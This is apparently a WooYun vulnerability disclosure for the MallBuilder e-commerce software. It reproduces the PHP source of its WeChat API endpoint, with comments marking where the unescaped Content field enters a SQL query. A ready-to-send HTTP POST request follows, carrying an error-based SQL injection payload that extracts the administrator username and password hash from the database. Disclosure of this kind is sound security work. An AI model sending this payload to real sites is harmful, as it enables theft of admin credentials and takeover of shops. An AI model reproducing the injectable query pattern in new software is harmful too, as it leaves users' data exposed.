WooYun.org

<?php
include_once("../includes/global.php");
@include_once("../config/wechat_config.php");
$wechat=$wechat_config['wechat']?$wechat_config['wechat']:"";
define("TOKEN", $wechat);
$wechatObj = new wechatCallbackapiTest();
if($_GET["echostr"]&&$_GET["signature"]&&$_GET["timestamp"]&&$_GET["nonce"])
//if后的get值不存在进入else语句
{  	
	$wechatObj->valid();	
}
else
{    
	$wechatObj->responseMsg(); //跟踪responseMsg()函数
}
class wechatCallbackapiTest
{
	public function valid()
    {
        $echoStr = $_GET["echostr"];
        if($this->checkSignature()){
			echo $echoStr;
        	exit;
        }
    }
    public function responseMsg()
    {  
		$postStr = $GLOBALS["HTTP_RAW_POST_DATA"];
		global $db,$config;
		if (!empty($postStr)){
			    
              	$postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);
              	
                $fromUsername = $postObj->FromUserName;
                $toUsername = $postObj->ToUserName;    
                $keyword = trim($postObj->Content);
                $time = time();
				$RX_TYPE = trim($postObj->MsgType);
				$num=0;
				
				$str="";
				
				if($RX_TYPE=='text')//是POST的MsgType为text
				{  
				
					if(!empty($keyword))	//在xml数据中定义Content变量
					{
					
						$sql="select pname,id,pic from ".PRO." where pname like '%$keyword%' order by id desc limit 0,4"; //Content 进入sql语句，可以注入
						$db->query($sql);
						$re=$db->getRows();
						foreach($re as $val)
						{
							$str.="<item>
								 <Title><![CDATA[".$val['pname']."]]></Title> 
								 <Description><![CDATA[]]></Description>
								 <PicUrl><![CDATA[".$val['pic']."]]></PicUrl>
								 <Url><![CDATA[".$config['weburl']."?m=product&s=detail&id=".$val['id']."]]></Url>
							</item>";
							$num++;
							echo "test2";
						}
						if($num>0)
						{
							$textTpl = "<xml>
							<ToUserName><![CDATA[%s]]></ToUserName>
							<FromUserName><![CDATA[%s]]></FromUserName>
							<CreateTime>%s</CreateTime>
							<MsgType><![CDATA[news]]></MsgType>
							<ArticleCount>".$num."</ArticleCount>
							<Articles>".$str."</Articles>
							<FuncFlag>1</FuncFlag>
							</xml>"; 
							$msgType = "text";
							$contentStr = "";
							$resultStr = sprintf($textTpl, $fromUsername, $toUsername, $time, $msgType, $contentStr);
							echo $resultStr;
							
						}
					}
					else
						echo "Input something1 ";
				}
				else{
                	echo "Input something2 ";
                }
        }else{
        	echo "";
        	echo "test6";
        	exit;
        }
    }
	private function checkSignature()
	{
        $signature = $_GET["signature"];
        $timestamp = $_GET["timestamp"];
        $nonce = $_GET["nonce"];	
        		
		$token = TOKEN;
		$tmpArr = array($token, $timestamp, $nonce);
		sort($tmpArr);
		$tmpStr = implode( $tmpArr );
		$tmpStr = sha1( $tmpStr );
		
		if( $tmpStr == $signature ){
			return true;
		}else{
			return false;
		}
	}
}
?>

POST /mallbuilder/api/wechat.php HTTP/1.1
Host: 127.0.0.1:8088
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=fdb687e31fb1d9a23b1b5dc3221123f9
<xml>							
<ToUserName>test1</ToUserName>							
<FromUserName>test3</FromUserName>						
<CreateTime>123456</CreateTime>
<MsgType>text</MsgType>							
<ArticleCount>11</ArticleCount>
<Articles>aaa</Articles>
<FuncFlag>0</FuncFlag>
<Content>test' and UpdateXML(1,CONCAT(0x5b,mid((SELECT (select concat(user,0x23,password) from mallbuilder_admin limit 1)),1,32),0x5d),1)#</Content>
</xml>